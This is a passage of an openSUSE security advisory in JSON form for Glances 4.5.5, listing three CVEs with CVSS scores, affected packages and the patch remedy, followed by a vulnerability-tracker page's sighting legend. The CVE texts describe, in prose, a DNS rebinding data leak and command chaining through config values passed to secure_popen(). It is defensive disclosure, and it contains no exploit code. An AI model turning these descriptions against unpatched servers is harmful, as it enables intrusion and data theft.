"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46608"
},
{
"cve": "CVE-2026-46611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46611",
"url": "https://www.suse.com/security/cve/CVE-2026-46611"
},
{
"category": "external",
"summary": "SUSE Bug 1268856 for CVE-2026-46611",
"url": "https://bugzilla.suse.com/1268856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-46611"
},
{
"cve": "CVE-2026-53925",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-53925"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-53925",
"url": "https://www.suse.com/security/cve/CVE-2026-53925"
},
{
"category": "external",
"summary": "SUSE Bug 1268984 for CVE-2026-53925",
"url": "https://bugzilla.suse.com/1268984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-53925"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…